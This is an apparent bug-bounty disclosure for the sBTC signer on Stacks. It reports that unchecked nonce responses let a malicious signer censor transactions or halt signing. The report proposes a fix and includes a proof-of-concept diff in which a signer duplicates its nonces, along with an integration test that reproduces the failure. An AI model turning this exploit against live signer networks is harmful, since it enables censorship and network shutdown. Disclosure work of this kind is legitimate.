#38516 [BC-High] Signer can censor transactions and halt the network by providing an invalid nonce or too many nonces
Submitted on Jan 5th 2025 at 15:55:56 UTC by @n4nika for Attackathon | Stacks
Report ID: #38516
Report Type: Blockchain/DLT
Report severity: High
Target: https://github.com/stacks-network/sbtc/tree/immunefi_attackaton_0.9/signer
Network not being able to confirm new transactions (total network shutdown)
Whenever a coordinator gathers nonces, the first threshold of signers providing a nonce are taken as the signer set. The problem is that during nonce gathering, not enough integrity checks are done on the provided nonces, allowing a signer to send malformed nonces and with that, censor any transactions they want to, in the worst case censoring ALL transactions, shutting down the network.
Finding Description
In wsts::fire.rs::gather_nonces
, we add a signer's provided nonce_response
to our public_nonces
without checking the integrity of the nonces
let nonce_info = self
.insert(nonce_response.signer_id, nonce_response.clone());
Since neither the validity of the nonce, nor the length of the nonces
vector is checked, we can either provide an invalid nonce, making it impossible to create a valid signature, or provide multiple nonces.
If we provide multiple nonces, we later fail in sign_with_tweak
when we try to create the aggregate signature:
pub fn sign_with_tweak(
&mut self,
msg: &[u8],
nonces: &[PublicNonce],
sig_shares: &[SignatureShare],
_key_ids: &[u32],
tweak: Option<Scalar>,
) -> Result<(Point, Signature), AggregatorError> {
if nonces.len() != sig_shares.len() {
return Err(AggregatorError::BadNonceLen(nonces.len(), sig_shares.len()));
// [...]
If this errors, the signature generation will be unsuccessful.
Consider checking that the length of the provided nonces
matches the length of valid unique key_ids
provided. If not, the packet should be dismissed and the signer marked as malicious.
Regarding the validity of the nonce, I am unsure how to properly check that at this point in the signing process.
Proof of Concept
Please apply the following diff and execute the test with cargo test --package signer --test integration -- transaction_coordinator::sign_bitcoin_transaction_poc --exact --show-output --ignored --nocapture
This will show that when we try to sign a message, sometimes we fail with Err(UnexpectedOperationResult(SignError(Coordinator(Aggregator(BadNonceLen(3, 2))))))
, showing that the whole signing round fails. Now this only happens sometimes in our simulated scenario since we use a 2/3
signing set. In a realworld scenario with a set of 11/15
, we are very likely to always provide a malicious nonce, causing the signing round to abort.
diff --git a/signer/src/transaction_coordinator.rs b/signer/src/transaction_coordinator.rs
index 26afe19c..6c998d5d 100644
--- a/signer/src/transaction_coordinator.rs
+++ b/signer/src/transaction_coordinator.rs
@@ -527,13 +527,15 @@ where
for mut transaction in transaction_package {
- self.sign_and_broadcast(
+ let res = self.sign_and_broadcast(
&mut transaction,
- .await?;
+ .await;
+ println!("res: {:?}", res);
+ res?;
// TODO: if this (considering also fallback clients) fails, we will
// need to handle the inconsistency of having the sweep tx confirmed
diff --git a/signer/src/transaction_signer.rs b/signer/src/transaction_signer.rs
index e5aa9575..22f27a7b 100644
--- a/signer/src/transaction_signer.rs
+++ b/signer/src/transaction_signer.rs
@@ -25,6 +25,7 @@ use crate::message;
use crate::message::BitcoinPreSignAck;
use crate::message::StacksTransactionSignRequest;
use crate::network;
+use crate::proto::NonceResponse;
use crate::stacks::contracts::AsContractCall as _;
use crate::stacks::contracts::ContractCall;
use crate::stacks::contracts::ReqContext;
@@ -38,10 +39,15 @@ use crate::wsts_state_machine::SignerStateMachine;
use bitcoin::hashes::Hash;
use bitcoin::TapSighash;
+use blockstack_lib::chainstate::nakamoto::signer_set;
use futures::StreamExt;
+use libp2p::autonat::OutboundFailure;
+use p256k1::point::Point;
+use wsts::common::PublicNonce;
use wsts::net::DkgEnd;
use wsts::net::DkgStatus;
use wsts::net::Message as WstsNetMessage;
+use wsts::net::SignatureShareResponse;
#[cfg_attr(doc, aquamarine::aquamarine)]
/// # Transaction signer event loop
@@ -728,7 +734,37 @@ where
if let WstsNetMessage::DkgEnd(DkgEnd { status: DkgStatus::Success, .. }) = outbound {
- let msg = message::WstsMessage { txid, inner: outbound };
+ let out: wsts::net::Message = match outbound {
+ WstsNetMessage::NonceResponse(mut response) => {
+ let out;
+ if self.get_signer_public_keys(bitcoin_chain_tip).await.unwrap().iter().nth(0).unwrap() == &self.signer_public_key() {
+ let mut new_nonces = response.nonces.clone();
+ new_nonces.append(response.nonces.as_mut());
+ // new_nonces = Vec::new();
+ // new_nonces.push(PublicNonce {D: Point::new(), E: Point::new()});
+ out = wsts::net::Message::NonceResponse(wsts::net::NonceResponse {
+ dkg_id: response.dkg_id,
+ sign_id: response.sign_id,
+ sign_iter_id: response.sign_iter_id,
+ signer_id: response.signer_id,
+ key_ids: response.key_ids,
+ nonces: new_nonces,
+ message: response.message
+ })
+ } else {
+ out = wsts::net::Message::NonceResponse(response);
+ }
+ out
+ },
+ _ => {
+ outbound
+ }
+ };
+ let msg = message::WstsMessage { txid, inner: out };
self.send_message(msg, bitcoin_chain_tip).await?;
diff --git a/signer/tests/integration/transaction_coordinator.rs b/signer/tests/integration/transaction_coordinator.rs
index bdf10d7e..aa7ef12f 100644
--- a/signer/tests/integration/transaction_coordinator.rs
+++ b/signer/tests/integration/transaction_coordinator.rs
@@ -4,7 +4,9 @@ use std::sync::atomic::AtomicU8;
use std::sync::atomic::Ordering;
use std::sync::Arc;
use std::time::Duration;
+use std::time::SystemTime;
+use bitcoin::block;
use bitcoin::consensus::Encodable as _;
use bitcoin::hashes::Hash as _;
use bitcoin::Address;
@@ -12,6 +14,7 @@ use bitcoin::AddressType;
use bitcoin::Amount;
use bitcoin::BlockHash;
use bitcoin::Transaction;
+use bitcoin::XOnlyPublicKey;
use bitcoincore_rpc::RpcApi as _;
use blockstack_lib::chainstate::nakamoto::NakamotoBlock;
use blockstack_lib::chainstate::nakamoto::NakamotoBlockHeader;
@@ -23,6 +26,7 @@ use blockstack_lib::net::api::getsortition::SortitionInfo;
use blockstack_lib::net::api::gettenureinfo::RPCGetTenureInfo;
use emily_client::apis::deposit_api;
use emily_client::apis::testing_api;
+use emily_client::models;
use emily_client::models::CreateDepositRequestBody;
use fake::Fake as _;
use fake::Faker;
@@ -47,6 +51,7 @@ use signer::keys::PrivateKey;
use signer::network::in_memory2::SignerNetwork;
use signer::network::in_memory2::WanNetwork;
use signer::request_decider::RequestDeciderEventLoop;
+use signer::stacks::api::StacksInteract;
use signer::stacks::api::TenureBlocks;
use signer::stacks::contracts::AsContractCall;
use signer::stacks::contracts::RotateKeysV1;
@@ -1582,6 +1587,418 @@ async fn sign_bitcoin_transaction() {
+#[cfg_attr(not(feature = "integration-tests"), ignore)]
+async fn sign_bitcoin_transaction_poc() {
+ let (_, signer_key_pairs): (_, [Keypair; 3]) = testing::wallet::regtest_bootstrap_wallet();
+ // let (_, signer_key_pairs): (_, [Keypair; 1]) = testing::wallet::regtest_bootstrap_wallet_single();
+ let (rpc, faucet) = regtest::initialize_blockchain();
+ // We need to populate our databases, so let's fetch the data.
+ let emily_client =
+ EmilyClient::try_from(&Url::parse("http://localhost:3031").unwrap()).unwrap();
+ testing_api::wipe_databases(emily_client.config())
+ .await
+ .unwrap();
+ let network = WanNetwork::default();
+ let chain_tip_info = rpc.get_chain_tips().unwrap().pop().unwrap();
+ // =========================================================================
+ // Step 1 - Create a database, an associated context, and a Keypair for
+ // each of the signers in the signing set.
+ // -------------------------------------------------------------------------
+ // - We load the database with a bitcoin blocks going back to some
+ // genesis block.
+ // =========================================================================
+ let mut signers = Vec::new();
+ for kp in signer_key_pairs.iter() {
+ let db_num = DATABASE_NUM.fetch_add(1, Ordering::SeqCst);
+ let db = testing::storage::new_test_database(db_num, true).await;
+ let ctx = TestContext::builder()
+ .with_storage(db.clone())
+ .with_first_bitcoin_core_client()
+ .with_emily_client(emily_client.clone())
+ .with_mocked_stacks_client()
+ .build();
+ backfill_bitcoin_blocks(&db, rpc, &chain_tip_info.hash).await;
+ let network = network.connect(&ctx);
+ signers.push((ctx, db, kp, network));
+ }
+ // =========================================================================
+ // Step 2 - Setup the stacks client mocks.
+ // -------------------------------------------------------------------------
+ // - Set up the mocks to that the block observer fetches at least one
+ // Stacks block. This is necessary because we need the stacks chain
+ // tip in the transaction coordinator.
+ // - Set up the current-aggregate-key response to be `None`. This means
+ // that each coordinator will broadcast a rotate keys transaction.
+ // =========================================================================
+ let (broadcast_stacks_tx, rx) = tokio::sync::broadcast::channel(10);
+ let stacks_tx_stream = BroadcastStream::new(rx);
+ for (ctx, _db, _, _) in signers.iter_mut() {
+ let broadcast_stacks_tx = broadcast_stacks_tx.clone();
+ ctx.with_stacks_client(|client| {
+ client.expect_get_tenure_info().returning(move || {
+ let response = Ok(RPCGetTenureInfo {
+ consensus_hash: ConsensusHash([0; 20]),
+ tenure_start_block_id: StacksBlockId([0; 32]),
+ parent_consensus_hash: ConsensusHash([0; 20]),
+ parent_tenure_start_block_id: StacksBlockId::first_mined(),
+ tip_block_id: StacksBlockId([0; 32]),
+ tip_height: 1,
+ reward_cycle: 0,
+ });
+ Box::pin(std::future::ready(response))
+ });
+ client.expect_get_block().returning(|_| {
+ let response = Ok(NakamotoBlock {
+ header: NakamotoBlockHeader::empty(),
+ txs: vec![],
+ });
+ Box::pin(std::future::ready(response))
+ });
+ let chain_tip = model::BitcoinBlockHash::from(chain_tip_info.hash);
+ client.expect_get_tenure().returning(move |_| {
+ let mut tenure = TenureBlocks::nearly_empty().unwrap();
+ tenure.anchor_block_hash = chain_tip;
+ Box::pin(std::future::ready(Ok(tenure)))
+ });
+ client.expect_get_pox_info().returning(|| {
+ let response = serde_json::from_str::<RPCPoxInfoData>(GET_POX_INFO_JSON)
+ .map_err(Error::JsonSerialize);
+ Box::pin(std::future::ready(response))
+ });
+ client
+ .expect_estimate_fees()
+ .returning(|_, _, _| Box::pin(std::future::ready(Ok(25))));
+ // The coordinator will try to further process the deposit to submit
+ // the stacks tx, but we are not interested (for the current test iteration).
+ client.expect_get_account().returning(|_| {
+ let response = Ok(AccountInfo {
+ balance: 0,
+ locked: 0,
+ unlock_height: 0,
+ // this is the only part used to create the stacks transaction.
+ nonce: 12,
+ });
+ Box::pin(std::future::ready(response))
+ });
+ client.expect_get_sortition_info().returning(move |_| {
+ let response = Ok(SortitionInfo {
+ burn_block_hash: BurnchainHeaderHash::from(chain_tip),
+ burn_block_height: chain_tip_info.height,
+ burn_header_timestamp: 0,
+ sortition_id: SortitionId([0; 32]),
+ parent_sortition_id: SortitionId([0; 32]),
+ consensus_hash: ConsensusHash([0; 20]),
+ was_sortition: true,
+ miner_pk_hash160: None,
+ stacks_parent_ch: None,
+ last_sortition_ch: None,
+ committed_block_hash: None,
+ });
+ Box::pin(std::future::ready(response))
+ });
+ // The coordinator broadcasts a rotate keys transaction if it
+ // is not up-to-date with their view of the current aggregate
+ // key. The response of None means that the stacks node does
+ // not have a record of a rotate keys contract call being
+ // executed, so the coordinator will construct and broadcast
+ // one.
+ client
+ .expect_get_current_signers_aggregate_key()
+ .returning(move |_| Box::pin(std::future::ready(Ok(None))));
+ // Only the client that corresponds to the coordinator will
+ // submit a transaction so we don't make explicit the
+ // expectation here.
+ client.expect_submit_tx().returning(move |tx| {
+ let tx = tx.clone();
+ let txid = tx.txid();
+ let broadcast_stacks_tx = broadcast_stacks_tx.clone();
+ Box::pin(async move {
+ broadcast_stacks_tx.send(tx).unwrap();
+ Ok(SubmitTxResponse::Acceptance(txid))
+ })
+ });
+ // The coordinator will get the total supply of sBTC to
+ // determine the amount of mintable sBTC.
+ client
+ .expect_get_sbtc_total_supply()
+ .returning(move |_| Box::pin(async move { Ok(Amount::ZERO) }));
+ })
+ .await;
+ }
+ // =========================================================================
+ // Step 3 - Start the TxCoordinatorEventLoop, TxSignerEventLoop and
+ // BlockObserver processes for each signer.
+ // -------------------------------------------------------------------------
+ // - We only proceed with the test after all processes have started, and
+ // we use a counter to notify us when that happens.
+ // =========================================================================
+ let start_count = Arc::new(AtomicU8::new(0));
+ for (ctx, _, kp, network) in signers.iter() {
+ let ev = TxCoordinatorEventLoop {
+ network: network.spawn(),
+ context: ctx.clone(),
+ context_window: 10000,
+ private_key: kp.secret_key().into(),
+ signing_round_max_duration: Duration::from_secs(10),
+ bitcoin_presign_request_max_duration: Duration::from_secs(10),
+ threshold: ctx.config().signer.bootstrap_signatures_required,
+ dkg_max_duration: Duration::from_secs(10),
+ sbtc_contracts_deployed: true,
+ is_epoch3: true,
+ };
+ let counter = start_count.clone();
+ tokio::spawn(async move {
+ counter.fetch_add(1, Ordering::Relaxed);
+ ev.run().await
+ });
+ let ev = TxSignerEventLoop {
+ network: network.spawn(),
+ threshold: ctx.config().signer.bootstrap_signatures_required as u32,
+ context: ctx.clone(),
+ context_window: 10000,
+ wsts_state_machines: HashMap::new(),
+ signer_private_key: kp.secret_key().into(),
+ rng: rand::rngs::OsRng,
+ dkg_begin_pause: None,
+ };
+ let counter = start_count.clone();
+ tokio::spawn(async move {
+ counter.fetch_add(1, Ordering::Relaxed);
+ ev.run().await
+ });
+ let ev = RequestDeciderEventLoop {
+ network: network.spawn(),
+ context: ctx.clone(),
+ context_window: 10000,
+ blocklist_checker: Some(()),
+ signer_private_key: kp.secret_key().into(),
+ };
+ let counter = start_count.clone();
+ tokio::spawn(async move {
+ counter.fetch_add(1, Ordering::Relaxed);
+ ev.run().await
+ });
+ let zmq_stream =
+ BitcoinCoreMessageStream::new_from_endpoint(BITCOIN_CORE_ZMQ_ENDPOINT, &["hashblock"])
+ .await
+ .unwrap();
+ let (sender, receiver) = tokio::sync::mpsc::channel(100);
+ tokio::spawn(async move {
+ let mut stream = zmq_stream.to_block_hash_stream();
+ while let Some(block) = stream.next().await {
+ sender.send(block).await.unwrap();
+ }
+ });
+ let block_observer = BlockObserver {
+ context: ctx.clone(),
+ bitcoin_blocks: ReceiverStream::new(receiver),
+ horizon: 10,
+ };
+ let counter = start_count.clone();
+ tokio::spawn(async move {
+ counter.fetch_add(1, Ordering::Relaxed);
+ block_observer.run().await
+ });
+ }
+ while start_count.load(Ordering::SeqCst) < 12 {
+ tokio::time::sleep(Duration::from_millis(10)).await;
+ }
+ // =========================================================================
+ // Step 4 - Wait for DKG
+ // -------------------------------------------------------------------------
+ // - Once they are all running, generate a bitcoin block to kick off
+ // the database updating process.
+ // - After they have the same view of the canonical bitcoin blockchain,
+ // the signers should all participate in DKG.
+ // =========================================================================
+ let chain_tip: BitcoinBlockHash = faucet.generate_blocks(1).pop().unwrap().into();
+ // We first need to wait for bitcoin-core to send us all the
+ // notifications so that we are up to date with the chain tip.
+ let db_update_futs = signers
+ .iter()
+ .map(|(_, db, _, _)| testing::storage::wait_for_chain_tip(db, chain_tip));
+ futures::future::join_all(db_update_futs).await;
+ // Now we wait for DKG to successfully complete. For that we just watch
+ // the dkg_shares table. Also, we need to get the signers' scriptPubKey
+ // so that we can make a donation, and get the party started.
+ let dkg_futs = signers
+ .iter()
+ .map(|(_, db, _, _)| testing::storage::wait_for_dkg(db));
+ futures::future::join_all(dkg_futs).await;
+ let (_, db, _, _) = signers.first().unwrap();
+ let shares = db.get_latest_encrypted_dkg_shares().await.unwrap().unwrap();
+ // =========================================================================
+ // Step 5 - Prepare for deposits
+ // -------------------------------------------------------------------------
+ // - Before the signers can process anything, they need a UTXO to call
+ // their own. For that we make a donation, and confirm it. The
+ // signers should pick it up.
+ // - Give a "depositor" some UTXOs so that they can make a deposit for
+ // sBTC.
+ // =========================================================================
+ let script_pub_key = shares.aggregate_key.signers_script_pubkey();
+ let network = bitcoin::Network::Regtest;
+ let address = Address::from_script(&script_pub_key, network).unwrap();
+ faucet.send_to(100_000, &address);
+ let depositor = Recipient::new(AddressType::P2tr);
+ let ITER = 10;
+ // Start off with some initial UTXOs to work with.
+ for _ in 0..ITER {
+ faucet.send_to(50_000_000, &depositor.address);
+ faucet.generate_blocks(1);
+ }
+ wait_for_signers(&signers).await;
+ println!("sent funding txs");
+ // =========================================================================
+ // Step 6 - Make a proper deposit
+ // -------------------------------------------------------------------------
+ // - Use the UTXOs confirmed in step (5) to construct a proper deposit
+ // request transaction. Submit it and inform Emily about it.
+ // =========================================================================
+ // Now lets make a deposit transaction and submit it
+ let mut utxos = depositor.get_utxos(rpc, None);
+ for _ in 0..ITER-1 {
+ let utxo = utxos.pop().unwrap();
+ let amount = 25_000;
+ let signers_public_key = shares.aggregate_key.into();
+ let max_fee = amount / 2;
+ let (deposit_tx, deposit_request, _) =
+ make_deposit_request(&depositor, amount, utxo, max_fee, signers_public_key);
+ rpc.send_raw_transaction(&deposit_tx).unwrap();
+ assert_eq!(deposit_tx.compute_txid(), deposit_request.outpoint.txid);
+ let body = CreateDepositRequestBody {
+ bitcoin_tx_output_index: deposit_request.outpoint.vout,
+ bitcoin_txid: deposit_request.outpoint.txid.to_string(),
+ deposit_script: deposit_request.deposit_script.to_hex_string(),
+ reclaim_script: deposit_request.reclaim_script.to_hex_string(),
+ };
+ let _ = deposit_api::create_deposit(emily_client.config(), body.clone())
+ .await
+ .unwrap();
+ }
+ // // ---- Creating zero-locktime deposit ----
+ // let utxo = utxos.pop().unwrap();
+ // let key_slice = [ // random invalid key
+ // 0x79, 0xBE, 0x66, 0x7E, 0xF9, 0xDC, 0xBB, 0xAC,
+ // 0x55, 0xA0, 0x62, 0x95, 0xCE, 0x87, 0x0B, 0x07,
+ // 0x02, 0x9B, 0xFC, 0xDB, 0x2D, 0xCE, 0x28, 0xD9,
+ // 0x59, 0xF2, 0x81, 0x5B, 0x16, 0xF8, 0x17, 0x98,
+ // ];
+ // let amount = 25_000;
+ // // let signers_public_key = shares.aggregate_key.into();
+ // let signers_public_key = XOnlyPublicKey::from_slice(&key_slice).unwrap();
+ // let max_fee = amount / 2;
+ // let (deposit_tx, deposit_request, _) =
+ // make_deposit_request(&depositor, amount, utxo, max_fee, signers_public_key);
+ // rpc.send_raw_transaction(&deposit_tx).unwrap();
+ // assert_eq!(deposit_tx.compute_txid(), deposit_request.outpoint.txid);
+ // let body = CreateDepositRequestBody {
+ // bitcoin_tx_output_index: deposit_request.outpoint.vout,
+ // bitcoin_txid: deposit_request.outpoint.txid.to_string(),
+ // deposit_script: deposit_request.deposit_script.to_hex_string(),
+ // reclaim_script: deposit_request.reclaim_script.to_hex_string(),
+ // };
+ // let _ = deposit_api::create_deposit(emily_client.config(), body.clone())
+ // .await
+ // .unwrap();
+ // // ----------------------------------------
+ let deposits = deposit_api::get_deposits(emily_client.config(), models::Status::Pending, None, None).await.unwrap();
+ // println!("DEPOSIT LENGTH DIRECT: {:?}", deposits.deposits.len());
+ // =========================================================================
+ // Step 7 - Confirm the deposit and wait for the signers to do their
+ // job.
+ // -------------------------------------------------------------------------
+ // - Confirm the deposit request. This will trigger the block observer
+ // to reach out to Emily about deposits. It was have one so the
+ // signers should do basic validations and store the deposit request.
+ // - Each TxSigner process should vote on the deposit request and
+ // submit the votes to each other.
+ // - The coordinator should submit a sweep transaction. We check the
+ // mempool for its existance.
+ // =========================================================================
+ // let deployer = signers.first().unwrap().0.config().signer.deployer;
+ // let result = signers.first().unwrap().0.stacks_client.get_current_signers_aggregate_key(&deployer).await;
+ // println!("= result current aggregate key: {:?}", result);
+ let chain_tip_: BitcoinBlockHash = faucet.generate_blocks(1).pop().unwrap().into();
+ wait_for_signers(&signers).await;
+ std::thread::sleep(Duration::new(10, 0));
+ let block_hash: BitcoinBlockHash = faucet.generate_blocks(1).pop().unwrap().into();
+ println!("last signing");
+ wait_for_signers(&signers).await;
+ std::thread::sleep(Duration::new(10, 0));
+ // let result = signers[0].0.storage.get_latest_sweep_transaction(&chain_tip_, 10000).await.unwrap();
+ // println!("RESULT chaintip: {:?}", result);
+ // let result = signers[0].0.storage.get_latest_sweep_transaction(&block_hash.into(), 10000).await.unwrap();
+ // println!("RESULT blockhash: {:?}", result);
/// Check that we do not try to deploy the smart contracts or rotate keys
/// if we think things are up to date.
#[cfg_attr(not(feature = "integration-tests"), ignore)]
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